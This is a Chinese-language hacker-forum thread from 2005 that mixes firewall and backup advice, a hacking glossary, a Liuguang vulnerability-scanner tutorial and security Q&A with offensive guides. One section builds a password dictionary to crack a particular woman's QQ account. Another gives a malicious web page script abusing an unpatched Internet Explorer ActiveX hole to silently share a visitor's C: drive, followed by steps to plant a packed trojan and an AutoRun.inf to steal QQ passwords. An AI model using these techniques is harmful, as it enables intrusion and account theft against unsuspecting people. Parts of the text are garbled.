亡羊補牢,如果资料備份及时,即便系统遭到骇客进攻,也可以在短时间内修复,挽回不必要的经濟損失。想国外很多商務网站,都会在每天晚上对系统资料进行備份,在第二天清晨,无论系统是否收到攻击,都会重新恢复资料,保证每天系统中的资料庫都不会出现損坏。资料的備份最好放在其他电脑或者驅动器上,这样骇客进入伺服器之后,破坏的资料只是一部分,因为无法找到资料的備份,对于伺服器的損失也不会太嚴重。
然而一旦受到骇客攻击,管理员不要只設法恢复損坏的资料,还要及时分析骇客的来源和攻击方法,尽快修補被骇客利用的漏洞,然后檢查系统中是否被骇客安装了木马、蠕蟲或者被骇客开放了某些管理员帳号,尽量将骇客留下的各种蛛絲马迹和后门分析清除、清除乾淨,防止骇客的下一次攻击。
6、使用加密机制传輸资料:
对于个人信用卡、密码等重要资料,在用户端與伺服器之间的传送,应该仙经过加密处理在进行发送,这样做的目的是防止骇客監听、截获。对于现在网路上流行的各种加密机制,都已经出现了不同的破解方法,因此在加密的选择上应该寻找破解困难的,例如DES加密方法,这是一套没有逆向破解的加密演算法,因此骇客的到了这种加密处理后的檔时,只能采取暴力破解法。个人用户只要选择了一个優秀的密码,那么骇客的破解工作将会在无休止的尝试后终止。
二、防火墙使用说明:
1.什么是防火墙?
防火墙的英文叫做firewall,它能够在网路與电脑之间建立一道監控屏障,保护在防火墙内部的系统不受网路骇客的攻击。邏輯上講,防火墙既是资讯分離器、限制器,也是资讯分析器,它可以有效地对局域网和Internet之间的任何活动进行監控,从而保证局域网内部的安全。
网路上最者名的软体防火墙是LockDown2000,这套软体需要经过註冊才能获得完整版本,它的功能強大,小到保护个人上网用户、大到维护商務网站的运作,它都能出色的做出驚人的表现。但因为软体的註冊需要一定費用,所以对个人用户来说还是选择一款免費的防火墙更现实。天网防火墙在这里就更加适合个人用户的需要了,天网防火墙个人版是一套给个人电脑使用的网路安全程式,它能够抵擋网路入侵和攻击,防止资讯洩露。
2、天网防火墙的基本功能:
天网防火墙个人版把网路分为本地网和互联网,可以針对来自不同网路的资讯,来設置不同的安全方案,以下所述的問題都是針对互联网而言的,故所有的設置都是在互联网安全级别中完成的。 怎样防止资讯洩露? 如果把檔共用向互联网开放,而且又不設定密码,那么别人就可以輕鬆的通过互联网看到您机器中的檔,如果您还允许共用可写,那别人甚至可以刪除檔。 你可以在个人防火墙的互联网安全级别設置中,将NETBIOS 关閉,这样别人就不能通过INTERNET访問你的共用资源了(这种設置不会影響你在局域网中的资源分享)。
当撥号用户上网获得了分配到的IP位址之后,可以通过天网防火墙将ICMP关閉,这样骇客用PING的方法就无法確定使用者的的系统是否处于上网狀態,无法直接通过IP位址获得使用者系统的资讯了。
需要指出的是:防火墙攔截的资讯并不完全是攻击资讯,它记录的只是系统在安全設置中所拒絕接收的资料包。在某些情況下,系统可能会收到一些正常但又被攔截的资料包,例如某些路由器会定时发出一些IGMP包等;或有些主机会定时PING出资料到本地系统確认連接仍在维持者,这个时候如果利用防火墙将ICMP和IGMP遮罩了,就会在安全记录中見到这些被攔截的资料包,因此这些攔截下来的资料包并不一定是骇客对系统进行攻击造成的。
3、使用防火墙的益处:
使用防火墙可以保护脆弱的服務,通过过濾不安全的服務,Firewall可以极大地提高网路安全和減少子网中主机的風險。例如,Firewall可以禁止NIS、NFS服務通过,同时可以拒絕源路由和ICMP重定向封包。
另外防火墙可以控制对系统的访問许可权,例如某些企業允许从外部访問企業内部的某些系统,而禁止访問另外的系统,通过防火墙对这些允许共用的系统进行設置,还可以設定内部的系统只访問外部特定的Mail Server和Web Server,保护企業内部资讯的安全。
4、防火墙的种类:
防火墙總体上分为包过濾、应用级閘道和代理伺服器等三种类型:
(1)数據包过濾
资料包过濾(PacketFiltering)技术是在网路層对资料包进行选择,选择的依據是系统内設置的过濾邏輯,被稱为访問控制表(Access ControlTable)。通过檢查资料流程中每个资料包的源位址、目的地址、所用的埠号、协定狀態等因素,或它们的組合来確定是否允许该资料包通过。 资料包过濾防火墙邏輯簡單,价格便宜,易于安装和使用,网路性能和透明性好,它通常安装在路由器上。路由器是内部网路與Internet連接必不可少的設備,因此在原有网路上增加这样的防火墙几乎不需要任何額外的費用。
资料包过濾防火墙的缺点有二:一是非法访問一旦突破防火墙,即可对主机上的软体和配置漏洞进行攻击;二是资料包的源位址、目的地址以及IP的埠号都在资料包的頭部,很有可能被竊听或假冒。
(2)应用级閘道
应用级閘道(ApplicationLevel Gateways)是在网路应用層上建立协定过濾和轉发功能。它針对特定的网路应用服務协定使用指定的资料过濾邏輯,并在过濾的同时,对资料包进行必要的分析、登记和统計,形成報告。实际中的应用閘道通常安装在專用工作站系统上。
资料包过濾和应用网关防火墙有一个共同的特点,就是它们僅僅依*特定的邏輯判定是否允许资料包通过。一旦满足邏輯,则防火墙内外的电脑系统建立直接联系,防火墙外部的用户便有可能直接了解防火墙内部的网路结構和运行狀態,这有利于实施非法访問和攻击。
(3)代理服務
代理服務(Proxy Service)也稱鏈路级閘道或TCP通道(Circuit LevelGateways or TCP Tunnels),也有人将它歸于应用级閘道一类。它是針对资料包过濾和应用閘道技术存在的缺点而引入的防火墙技术,其特点是将所有跨越防火墙的网路通信鏈路分为两段。防火墙内外电脑系统间应用層的" 鏈结",由两个终止代理伺服器上的" 鏈结"来实现,外部电脑的网路鏈路只能到达代理伺服器,从而起到了隔離防火墙内外电脑系统的作用。此外,代理服務也对过往的资料包进行分析、註冊登记,形成報告,同时当发现被攻击迹象时会向网路管理员发出警報,并保留攻击痕迹
=========================================================
骇客之“名詞介绍”
1.肉雞,或者留了后门,可以被我们远端操控的机器,现在许多人把有WEBSHELL许可权的机器也叫肉雞。
2、木马:特洛伊木马,大家在电影《特洛伊》里应该看到了,戰爭是特絡伊故意留下了个木马,多方以为是戰利品,帶回城后,木马里面全是戰士,这种東西,就叫做木马,可以说木马就是一方给肉雞留下的東西,可以做到远端控制的目的,木马还分不同的作用,有盜号專用的木马,有远程控制專用的木马,下面介绍点:盜号專用的有许多,盜QQ的有 啊拉QQ大盜,強強盜QQ,传奇木马生成器,魔獸木马生成器等;远程控制的木马有:冰河(国人的驕傲,中国第一款木马),灰鴿子,PCshare,网路神偷,FLUX等,现在通过线程插入技术的木马也有很多,大家自己找找吧。
3、病毒:这个我想不用解释了吧,相信大家都和它打过交道,病毒大多具有破坏性,传播性,隱秘性,潛伏性。
4、后门:这个就是入侵后为方便我们下次进入肉雞方便点所留下的東西,親切的稱为后门,现在好点的后门有REDMAIN等。
5、CRACK:这个名詞很容易和HACK混淆,但是许多人不理解CRACK这个東西,但是接触过软体破解的人一定了解这个詞 CRACKER分析下就是软体破解者的意思(注意这里有多了个ER),许多共用软体就是我们的CRACKER来完成破解的,就是现在俗稱的XX软体破解版。
6、漏洞:这个名詞相信也不用太多的介绍,根據字面意思也可以理解,就好象一个房子,门很结实,可是有个窗户卻不好,这就很可能造成被别人进入,入侵是也是相对的,必须要有漏洞才可以入侵,这里順便介绍下打補丁的意思,还是用上面的例子门很结实,可窗户不好,这里我们需要把窗户補上,就叫打補丁了,许多人問过我怎样知道自己的机器有漏洞?怎样打補丁?这里也回答下,首先介绍怎样檢查自己奇迹有什么样的漏洞,有款工具簡稱为MBSA是微软公司針对windows系统的安全檢測工具,大家可以去网上找到自己下下来檢測下自己机器有什么样的漏洞,还介绍下微软的漏洞名稱 MS05-001MS05-002 这种形式的前面MS应为是微软的意思吧,05呢是2005年,001是在2005年第一个漏洞(不知道解释的对不,自己的理解)大家还可以下个金山毒霸,金山可以有个漏洞檢測功能,还可以帮你補上相应的補丁,那么怎么打補丁呢?其实这个很簡單,在微软的官方网站里可以輸入 MS05-001(如果你有这个漏洞的話)微软就找出了回应的補丁,下載下来 安装下其实就可以了,呵呵,打補丁也不是什么困难的事情哦。
7、埠:这个是入侵是很重要的一个環节,埠这个東西就好象是我要買東西,需要在1号視窗来结帳,而开放的1号視窗就好比回应的埠,埠可以形象的比喻成視窗,呵呵,不同的埠开放了不同的服務,大家可以在网上找到埠对照表来看下不同的埠开放的是什么服務。
8、许可权:这个東西和人权一个效果,我们有自己的权利,但是我们的权利不能超出自己的範圍,比如法律可以控制人的生命,这种最高许可权呢就是电脑中的 Admin许可权 最高许可权,法官呢是执行法律的人,比法律底点,这个呢就是SYSTEM许可权,系统许可权,以下每种人有者自己不同的许可权,比如我们得到了个WEBSHELL许可权,许多人不知道这个是什么许可权,其实就是个WEB(网業)的管理许可权,许可权一般比较低,但是有时想得到个伺服器的ADMIN许可权,就可以先叢WEBSHELL许可权来入手,也就是长说的提权。
==================================================
骇客利器流光使用技巧
流光这款软体除了能够像X-Scan那样扫描眾多 漏洞、弱口令外,还集成了常用的入侵工具,如字典工具、NT/IIS工具等,还独創了能够控制“肉雞”进行扫描的“流光Sensor工具”和为“肉雞”安装服務的“种植者”工具。
[img]http://cimg.163.com/catchpic/0/01/017362E7E9CD9FEFEA3E63510AD2FAA9.jpg');"onload='if(this.width>screen.width-460)this.width=screen.width-460'>
與X-Scan相比,流光的功能多一些,但操作起来难免繁杂。由于流光的功能过于強大,而且功能还在不断擴充中,因此流光的作者小榕限制了流光所能扫描的IP範圍,不允许流光扫描国内IP位址,而且流光測试版在功能上也有一定的限制。但是,入侵者为了能够最大限度地使用流光,在使用流光之前,都需要用專门的破解程式对流光进行破解,去除IP範圍和功能上的限制。
安装與打補丁完成后,打开流光,介面如圖所示。
实例:使用流光高级扫描功能檢測210.□.□.2到210.□.□.253网段主机的系统缺陷
步驟一:打开高级扫描嚮導、設置扫描參数。
在流光4.7主介面下,通过选择“檔(F)”→“高级扫描嚮導(W)”或使用快捷健“Ctrl+W”打开高级扫描嚮導。在“起始位址”和“结束位址”分别填入目标网段主机的开始和结束IP位址;在“目标系统”中选择預檢測的作業系统类型;在“获取主机名”、“PING檢查”前面打鉤;在“檢測项目”中,选择“全选”;选好后如圖所示。[morningsky]
然后單击“下一步(N)”按鈕,在圖中选中“标準埠扫描”。
说明:
“标準埠扫描”:只对常見的埠进行扫描。
“自定埠扫描範圍”:自定義埠範圍进行扫描。
然后單击“下一步(N)”按鈕,在圖中进行設置。
設置好所有檢測项目后,然后單击“下一步(N)”按鈕来到圖介面,选择“本地主机”,表示使用本机执行扫描任務。
步驟二:开始扫描。
在圖1-69中單击“开始(S)”按鈕进行扫描。在扫描过程中,如果想要停止,通过單击最下角的“取消”按鈕来实现,不过需要相当一段时间才能真正地停止,所以建议一次不要扫太大的网段,如果因扫描时间过长而等不及,这时候再想让流光停下来是不容易的。
步驟三:查看扫描報告。
扫描结束后,流光会自动打开HTML格式的扫描報告,如圖所示。
需要指出的是,在扫描完成后,流光不僅把扫描结果整理成報告檔,而且还把可利用的主机列在流光介面的最下方,如圖所示。
除了使用“高级扫描嚮導”配置高级扫描外,还可以直接选取高级扫描工具,如圖所示。
打开“高级扫描設置”,其介面如圖所示。
关于流光的使用就介绍到这里,本节中所介绍的只是流光功能的一小部分,其他一些功能会在以后的实例中逐一介绍。流光扫描器自身的設置是比较复杂的,有很多选项可以自由設定,因而也给使用者更大的发揮空间,可以根據网路和机器的狀況来尝试改变这些設置,提高扫描器的性能,而且流光中还有詳細的FAQ問題解答。
[ 此帖被cy20在2005-11-06 00:25重新编輯 ]
[1 樓] | 发表于:2005-11-0405:35 PM
免費自由共用 让菜鸟在校園骇客联盟起飛WwW.SchoolHacker.CoM
cy20
级别: 優秀学生
精華: 1
发帖: 125
威望: 330 点
大洋: 6525 ¥
貢獻值: 0 点
线上时间:33(小时)
註冊时间:2005-10-27
最后登陸:2006-02-27
--------------------------------------------------------------------------------
骇客新手基础知识16問答
問:什么是网路安全?
答:网路安全是指网路系统的硬体、软体及其系统中的资料受到保护,不因偶然的或者惡意的原因而遭到破坏、更改、洩露,系统可以連續可*正常地运行,网路服務不被中断。
問:什么是电脑病毒?
答:电脑病毒(Computer Virus)是指编制者在电脑程式中插入的破坏电脑功能或者破坏资料,影響电脑使用并且能够自我复制的一組电脑指令或者程式码。
問:什么是木马?
答:木马是一种帶有惡意性質的远端控制软体。木马一般分为用户端(client)和伺服器端(server)。用户端就是本地使用的各种命令的控制台,伺服器端则是要给别人运行,只有运行过伺服器端的电脑才能够完全受控。木马不会像病毒那样去感染檔。
問:什么是防火墙?它是如何確保网路安全的?
答:使用防火墙(Firewall)是一种確保网路安全的方法。防火墙是指設置在不同网路(如可信任的企業内部网和不可信的公共网)或网路安全域之间的一系列部件的組合。它是不同网路或网路安全域之间资讯的惟一出入口,能根據企業的安全政策控制(允许、拒絕、監測)出入网路的资讯流,且本身具有较強的抗攻击能力。它是提供资讯安全服務,实现网路和资讯安全的基础設施。
問:什么是后门?为什么会存在后门?
答:后门(Back Door)是指一种繞过安全性控制而获取对程式或系统访問权的方āT諶砑目⒔錐危絛蛟背;嵩諶砑詿唇ê竺乓员憧梢孕薷某絛蛑械娜毕蕁H綣竺瘧黃淥酥溃蚴竊詵⒉既砑懊揮猩境敲此统閃稅踩肌?
問:什么叫入侵檢測?
答:入侵檢測是防火墙的合理補充,帮助系统对付网路攻击,擴展系统管理员的安全管理能力(包括安全審計、監視、进攻识别和回应),提高资讯安全基础结構的完整性。它从电脑网路系统中的若干关鍵点收集资讯,并分析这些资讯,檢查网路中是否有违反安全策略的行为和遭到襲击的迹象
問:什么叫资料包監測?它有什么作用?
答:资料包監測可以被认为是一根竊听电話线在电脑网路中的等价物。当某人在“監听”网路时,他们实际上是在阅读和解释网路上传送的资料包。如果你需要在互联网上通过电脑发送一封电子郵件或请求下載一个网页,这些操作都会使资料通过你和资料目的地之间的许多电脑。这些传輸资讯时经过的电脑都能够看到你发送的资料,而资料包監測工具就允许某人截获资料并且查看它。
問:什么是NIDS?
答:NIDS是NetworkIntrusion Detection System的縮写,即网路入侵檢測系统,主要用于檢測Hacker或Cracker通过网路进行的入侵行为。NIDS的运行方式有两种,一种是在目标主机上运行以監測其本身的通信资讯,另一种是在一台單独的机器上运行以監測所有网路設備的通信资讯,比如Hub、路由器。
問:什么叫SYN包?
答:TCP連接的第一个包,非常小的一种资料包。SYN攻击包括大量此类的包,由于这些包看上去来自实际不存在的站点,因此无法有效进行处理。
問:加密技术是指什么?
答:加密技术是最常用的安全保密手段,利用技术手段把重要的资料变为乱码(加密)传送,到达目的地后再用相同或不同的手段还原(解密)。
加密技术包括两个元素:演算法和密鑰。演算法是将普通的资讯或者可以理解的资讯與一串数位(密鑰)结合,產生不可理解的密文的步驟,密鑰是用来对资料进行编码和解密的一种演算法。在安全保密中,可通过适当的鑰加密技术和管理机制来保证网路的资讯通信安全。
問:什么叫蠕蟲病毒?
答:蠕蟲病毒(Worm)源自第一种在网路上传播的病毒。1988年,22歲的康奈爾大学研究生羅伯特·莫里斯(Robert Morris)通过网路发送了一种專为攻击UNIX系统缺陷、名为“蠕蟲”(Worm)的病毒。蠕蟲造成了6000个系统癱瘓,估計損失为200萬到6000萬美元。由于这只蠕蟲的誕生,在网上还專门成立了电脑应急小組(CERT)。现在蠕蟲病毒家族已经壯大到成千上萬种,并且这千萬种蠕蟲病毒大都出自骇客之手。
問:什么是作業系统型病毒?它有什么危害?
答:这种病毒会用它自己的程式加入作業系统或者取代部分作業系统进行工作,具有很強的破坏力,会導致整个系统癱瘓。而且由于感染了作業系统,这种病毒在运行时,会用自己的程式片断取代作業系统的合法程式模組。根據病毒自身的特点和被替代的作業系统中合法程式模組在作業系统中运行的地位與作用,以及病毒取代作業系统的取代方式等,对作業系统进行破坏。同时,这种病毒对系统中檔的感染性也很強。
問:莫里斯蠕蟲是指什么?它有什么特点?
答:它的编写者是美国康乃爾大学一年级研究生羅特·莫里斯。这个程式只有99行,利用了Unix系统中的缺点,用Finger命令查联机用户名單,然后破譯用户口令,用Mail系统复制、传播本身的根源程式,再编譯生成代码。
最初的网路蠕蟲設計目的是当网路空閒时,程式就在电脑间“遊蕩”而不帶来任何損害。当有机器負荷过重时,该程式可以从空閒电脑“借取资源”而达到网路的負載平衡。而莫里斯蠕蟲不是“借取资源”,而是“耗盡所有资源”。
問:什么是DDoS?它会導致什么后果?
答:DDoS也就是分散式拒絕服務攻击。它使用與普通的拒絕服務攻击同样的方法,但是发起攻击的源是多个。通常攻击者使用下載的工具滲透无保护的主机,当获得该主机的适当的访問许可权后,攻击者在主机中安装软体的服務或进程(以下簡稱代理)。这些代理保持睡眠狀態,直到从它们的主控端得到指令,对指定的目标发起拒絕服務攻击。隨者危害力极強的骇客工具的廣泛传播使用,分散式拒絕服務攻击可以同时对一个目标发起几千个攻击。單个的拒絕服務攻击的威力也许对帶寬较寬的站点没有影響,而分佈于全球的几千个攻击将会產生致命的后果。
問:局域网内部的ARP攻击是指什么?
答:ARP协定的基本功能就是通过目标設備的IP位址,查詢目标設備的MAC位址,以保证通信的进行。
基于ARP协议的这一工作特性,骇客向对方电脑不断发送有欺詐性質的ARP资料包,资料包内包含有與当前設備重复的Mac位址,使对方在回应報文时,由于簡單的位址重复错误而導致不能进行正常的网路通信。一般情況下,受到ARP攻击的电脑会出现两种现象:
1.不断彈出“本机的XXX段硬体位址與网路中的XXX段位址衝突”的对話方塊。
2.电脑不能正常上网,出现网路中断的症狀。
因为这种攻击是利用ARP请求報文进行“欺騙”的,所以防火墙会误以为是正常的请求资料包,不予攔截。因此普通的防火墙很难抵擋这种攻击。
問:什么叫欺騙攻击?它有哪些攻击方式?
答:网路欺騙的技术主要有:HONEYPOT和分散式HONEYPOT、欺騙空间技术等。主要方式有:IP欺騙、ARP欺騙、DNS欺騙、Web欺騙、电子郵件欺騙、源路由欺騙(通过指定路由,以假冒身份與其他主机进行合法通信或发送假報文,使受攻击主机出现错误动作)、位址欺騙(包括伪造源位址和伪造中间站点)等。
========================================================
菜鸟骇客入门攻击及防範技巧
在正式进行各种“骇客行为”之前,骇客会采取各种手段,探測(也可以说“偵察”)对方的主机资讯,以便决定使用何种最有效的方法达到自己的目的。来看看骇客是如何获知最基本的网路资讯——对方的IP位址;以及用户如何防範自己的IP洩漏。
■ 获取IP
“IP”作为Net用户的重要标示,是骇客首先需要了解的。获取的方法较多,骇客也会因不同的网路情況采取不同的方法,如:在局域网内使用Ping指令,Ping对方在网路中的名稱而获得IP;在Internet上使用IP版的QQ直接顯示。而最“牛”,也是最有效的辦法是截获并分析对方的网路资料包。如圖1所示,这是用Windows 2003的网路監視器捕获的网路资料包,可能一般的用户比较难看懂这些16进制的代码,而对于了解网路知识的骇客,他们可以找到并直接通过软体解析截获后的资料包的IP包頭资讯,再根據这些资讯了解具体的IP。
■ 隱藏IP
雖然偵察IP的方法多样,但用户可以隱藏IP的方法同样多样。就拿对付最有效的“资料包分析方法”而言,就可以安装能够自动去掉发送资料包包頭IP资讯的“Norton InternetSecurity 2003”。不过使用“Norton Internet Security”有些缺点,譬如:它耗費资源嚴重,降低电脑性能;在访問一些论坛或者网站时会受影響;不适合网吧用户使用等等。现在的个人用户采用最普及隱藏IP的方法应该是使用代理,由于使用代理伺服器后,“轉址服務”会对发送出去的资料包有所修改,致使“资料包分析”的方法失效。一些容易洩漏用户IP的网路软体(QQ、MSN、IE等)都支援使用代理方式連接Internet,特别是QQ使用“ezProxy”等代理软体連接后,IP版的QQ都无法顯示该IP位址。这里筆者介绍一款比较适合个人用户的簡易代理软体——网路新手IP隱藏器(如圖2),只要在“代理伺服器”和“代理伺服器端”填入正確的代理伺服器位址和埠,即可对http使用代理,比较适合由于IE和QQ洩漏IP的情況。
不过使用代理伺服器,同样有一些缺点,如:会影響网路通讯的速度;需要网路上的一台能够提供代理能力的电脑,如果用户无法找到这样的代理伺服器就不能使用代理(查找代理伺服器时,可以使用“代理獵手”等工具软体扫描网路上的代理伺服器)。
雖然代理可以有效地隱藏用户IP,但高深的骇客亦可以繞过代理,查找到对方的真实IP位址,用户在何种情況下使用何种方法隱藏IP,也要因情況而论。
骇客的探測方式里除了偵察IP,还有一项——埠扫描。通过“埠扫描”可以知道被扫描的电脑哪些服務、埠是打开而没有被使用的(可以理解为寻找通往电脑的通道)。
一、埠扫描
网上很容易找到远端埠扫描的工具,如Superscan、IP Scanner、Fluxay(流光)等(如圖1),这就是用“流光”对试验主机192.168.1.8进行埠扫描后的结果。从中我们可以清楚地了解,该主机的哪些非常用埠是打开的;是否支援FTP、Web服務;且FTP服務是否支援“匿名”,以及IIS版本,是否有可以被成功攻破的IIS漏洞也顯示出来。
二、阻止埠扫描
防範埠扫描的方法有两个:
1. 关閉閒置和有潛在危險的埠
这个方法有些“死板”,它的本質是——将所有用户需要用到的正常电脑埠外的其他埠都关閉掉。因为就骇客而言,所有的埠都可能成为攻击的目标。换句話说“电脑的所有对外通讯的埠都存在潛在的危險”,而一些系统必要的通讯埠,如访問网页需要的HTTP(80埠);QQ(4000埠)等不能被关閉。
在Windows NT核心系统(Windows 2000/XP/2003)中要关閉掉一些閒置埠是比较方便的,可以采用“定向关閉指定服務的埠”和“只开放允许埠的方式”。电脑的一些网路服務会有系统分配默认的埠,将一些閒置的服務关閉掉,其对应的埠也会被关閉了(如圖2)。进入“控制面板”、“管理工具”、“服務”项内,关閉掉电脑的一些没有使用的服務(如FTP服務、DNS服務、IIS Admin服務等等),它们对应的埠也被停用了。至于“只开放允许埠的方式”,可以利用系统的“TCP/IP篩选”功能实现,設置的时候,“只允许”系统的一些基本网路通讯需要的埠即可(关于“TCP/IP的篩选”,请參看本期应用專題)。
2. 檢查各埠,有埠扫描的症狀时,立即遮罩该埠
这种預防埠扫描的方式顯然用户自己手工是不可能完成的,或者说完成起来相当困难,需要借助软体。这些软体就是我们常用的网路防火墙。
防火墙的工作原理是:首先檢查每个到达你的电脑的资料包,在这个包被你机上运行的任何软体看到之前,防火墙有完全的否决权,可以禁止你的电脑接收Internet上的任何東西。当第一个请求建立連接的包被你的电脑回应后,一个“TCP/IP埠”被打开;埠扫描时,对方电脑不断和本地电脑建立連接,并逐渐打开各个服務所对应的“TCP/IP埠”及閒置埠,防火墙经过自帶的攔截規则判断,就能够知道对方是否正进行埠扫描,并攔截掉对方发送过来的所有扫描需要的资料包。
现在市面上几乎所有网路防火墙都能够抵禦埠扫描,在默认安装后,应该檢查一些防火墙所攔截的埠扫描規则是否被选中,否则它会放行埠扫描,而只是在日誌中留下资讯而已。
骇客在进行攻击前的準備工作,就此介绍完毕。在以后的内容中,将轉入正式的入侵、竊取和攻击等具体的介绍。
上网了吧,用Q了吧,被盜了吧,正常。想上网吧,想用Q吧,不想被盜Q吧,正常。那就来了解一些盜QQ方面的知识吧!
一、名詞解释
1.字典
所谓字典,其实就是一个包含有许多密码的文字檔案。字典的生成有两种方式:用字典软体生成和手动添加。一般字典软体能生成包含生日、电話号码、常用英文名等密码的字典,不过由于这样生成的字典体积大,而且不靈活,所以骇客往往会手动添加一些密码到字典里去,形成一个“智慧化”的密码檔。
2.暴力破解
所谓暴力破解,其实就是用无数的密码来與登录QQ的密码进行核对,直到相同为止。暴力破解这种方法不僅可以运用在盜QQ上,在破解其他密码时也常用这种方法,如:破解系统管理员密码等。这是最常用的一种破解方式。
二、原理分析
现在盜QQ的软体有两种,本地破解和远端破解。看起来好像挺神秘的,其实说穿了就那么回事。下面咱们先来看看本地破解。
1.本地破解
本地破解其实就是用软体选择一个在本地登录过的QQ号码,然后掛上字典进行密码核对。本地破解也可分为两种:暴力破解和本地记录。而暴力破解又分为两种:按順序增加和通过字典对比。比如现在我要破解QQ号为123456的密码,我可以用1作为密码进行核对,如果正確就可以盜走该号了,如果不正確,则用2来核对,还不正確,则用3,以此順序增加,直到和密码相同为止。不过这样的破解效率是很低的,因为许多人的密码并不只是数位,所以这种方法并不常見。
平时常用的是通过对比字典中密码的方法,如果正確就盜走QQ。因为字典可以做得很“智慧化”,所以这种破解效率相对较高,特别是当你的密码是簡單的数位,或是数位加一些英文名时特别明顯。举个例子,比如我在网吧看到一MM的英文名为alice,密码位元数为8位元(我怎么知道的?暈!偷看到的嘛!)。从常理来講,一般她的密码就是alice加上一些数位。于是我可以用易優超级字典生成器制作这样一个字典:把alice做为特殊字元排在密码的第1-5位(如圖1),然后把基本字元里的数位全部选上,再将密码位元数設为8,然后选好保存位置点“生成字典”。
圖1
打开生成的字典,你就可以看到alice000、alice001等密码了(如圖2)。然后就是把alice放在第2-6位,第3-7位,第4-8位,其他位置同样用数位填满。接下来我只要用软体把这些字典掛上进行破解,很快就可以得到QQ密码了。
===============================================
骇客通过网页竊取QQ方法
要想偷别人的QQ,方法有很多了。利用惡意网页使对方的电脑被共用出来是很有趣的一招。方法是:在你的网站网页中加入如下内容的代码:
------------------------------------------------------------------------
<scriptlanguage=Java Script>
document.write("<APPLET HEIGHT=0WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f()
{*********************];
al.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
al.createlnstance()
Shl=al.GetObject()Shl.RegWrite("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan//RWC$//Flafgs",302,"REG_DWORD");
Shl.RegWrite("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan//RWC$//Type",0,"REG_DWORD");
Shl.RegWrite("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan//RWC$//Path","C://");}
function init()
{setTimeout("f()",1000);}
{********************}
init()
</script>
-------------------------------------
上面的代码大家一定很容易读懂,簡單说来就是通过修改对方註冊表中的鍵值,把对方的C盤共用出来,如果想让对方的其他盤都共用请自行設置。
述代码中{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}代表WindowsScripting Host(WSH)的外殼对象。WSH是微软提供的一种基于32位Windows平台的、與语言无关的脚本解释机制,它使得脚本能够直接在Windows桌面或命令提示符下运行。WSH使得脚本可以被执行,就象执行批次处理一样。以“Shl.RegWrite”开頭的这几句代码的作用是写入流览者的註冊表,就是它们使得对方的硬碟被共用的。把“Flags”的鍵值設为00000302可以隱藏共用,使对方无法发现,非常隱蔽。
网页做好后,把它上传你的主页空间,騙他流览你的网页(就看你的嘴皮子功夫了),如果对方的IE没有打補丁(网上这样的电脑有很多),就可以把他的C盤共用出来。整个方法的原理就是把com.ms.activeX.ActiveXComponent物件嵌入<APPLET>标记中,这样会導致任意創建和解释执行ActiveX物件,使我们可以創建任意檔、运行程式、写註冊表。未打補丁的IE,在打开含有上述代码的网页时不会有任何警告,我们就是利用这个漏洞把对方的硬碟被共用出来。
等对方中招后,就把对方的硬碟映射过来,可以使用net use命令,也可以使用网路刺客II等软体。下一步可以给对方植入一个盜QQ的软体,比方说QQ殺手等,注意一定要用ASPack或其他加殼软体给木马加殼(其实就是另类“壓縮”),防止殺毒软体发现。
最后,打开记事本鍵入以下内容:
[AutoRun]
open=winnt32.exe
保存为AutoRun.inf,其中的winnt32.exe为木马文件。把AutoRun.inf和winnt32.exe一起拷到对方某分区的根目录下。这样,只要他雙击该分区就会中木马!这样可以大大的增加木马运行的主动性!须知许多人现在都非常警惕,不熟悉的檔他们輕易的不会运行,而这种方法就很难防範了。
以后,你就等者用郵箱收信收对方的QQ密码吧。
注意,本文只是技术交流,大家不要隨意盜取别人的QQ。同时为了保障安全我们没有完全刊登源代码。敬请原諒!
===================================
选择漏洞扫描工具
对于一个复杂的多層结構的系统和网路安全規劃来说,隱患扫描是一项重要的組成元素。隱患扫描能够类比骇客的行为,对系统設置进行攻击測试,以帮助管理员在骇客攻击之前,找出网路中存在的 漏洞。这样的工具可以远端評估你的网路的安全级别,并生成評估報告,提供相应的整改措施。
目前,市场上有很多隱患扫描工具,按照不同的技术(基于网路的、基于主机的、基于代理的、C/S的)、不同的特徵、不同的報告方法,以及不同的監听模式,可以分成好几类。不同的產品之间,漏洞檢測的準確性差别较大,这就决定了生成的報告的有效性上也有很大区别。
选择正確的隱患扫描工具,对于提高你的系统的安全性,非常重要。
1、漏洞扫描概述
在字典中,Vulnerability意思是漏洞或者缺乏足够的防护。在軍事术语中,这个詞的意思更为明確,也更为嚴重------有受攻击的嫌疑。
每个系统都有漏洞,不论你在系统安全性上投入多少財力,攻击者仍然可以发现一些可利用的特徵和配置缺陷。这对于安全管理员来说,实在是个不利的消息。但是,多数的攻击者,通常做的是簡單的事情。发现一个已知的漏洞,远比发现一个未知漏洞要容易的多,这就意味者:多数攻击者所利用的都是常見的漏洞,这些漏洞,均有书面资料记載。
⑤ 生成的報告的特性(内容是否全面、是否可配置、是否可定制、報告的格式、輸出方式等);
⑥ 对于漏洞修复行为的分析和建议(是否只報告存在哪些問題、是否会告訴您应该如何修補这些漏洞);
⑦ 安全性(由于有些扫描工具不僅僅只是发现漏洞,而且还进一步自动利用这些漏洞,扫描工具自身是否会帶来安全風險);
⑧ 性能;
⑨ 价格结構
这样的話,采用适当的工具,就能在骇客利用这些常見漏洞之前,查出网路的薄弱之处。如何快速簡便地发现这些漏洞,这个非常重要。
漏洞,大体上分为两大类:
① 软体编写错误造成的漏洞;
② 软体配置不当造成的漏洞。
漏洞扫描工具均能檢測以上两种类型的漏洞。漏洞扫描工具已经出现好多年了,安全管理员在使用这些工具的同时,骇客们也在利用这些工具来发现各种类型的系统和网路的漏洞。
入侵是重要的第一步。当您邁出了这一步后,接下来的是:如何选择满足您公司需要的合适的隱患扫描技术,这同样也很重要。以下列出了一系列衡量因素:
① 底層技术(比如,是被动扫描还是主动扫描,是基于主机扫描还是基于网路扫描);
② 特性;
③ 漏洞庫中的漏洞数量;
④ 易用性;
2.1 底層技术
比较漏洞扫描工具,第一是比较其底層技术。你需要的是主动扫描,还是被动扫描;是基于主机的扫描,还是基于网路的扫描,等等。一些扫描工具是基于Internet的,用来管理和集合的伺服器程式,是运行在软体供应商的伺服器上,而不是在客户自己的机器上。这种方式的優点在于檢測方式能够保证经常更新,缺点在于需要依賴软体供应商的伺服器来完成扫描工作。
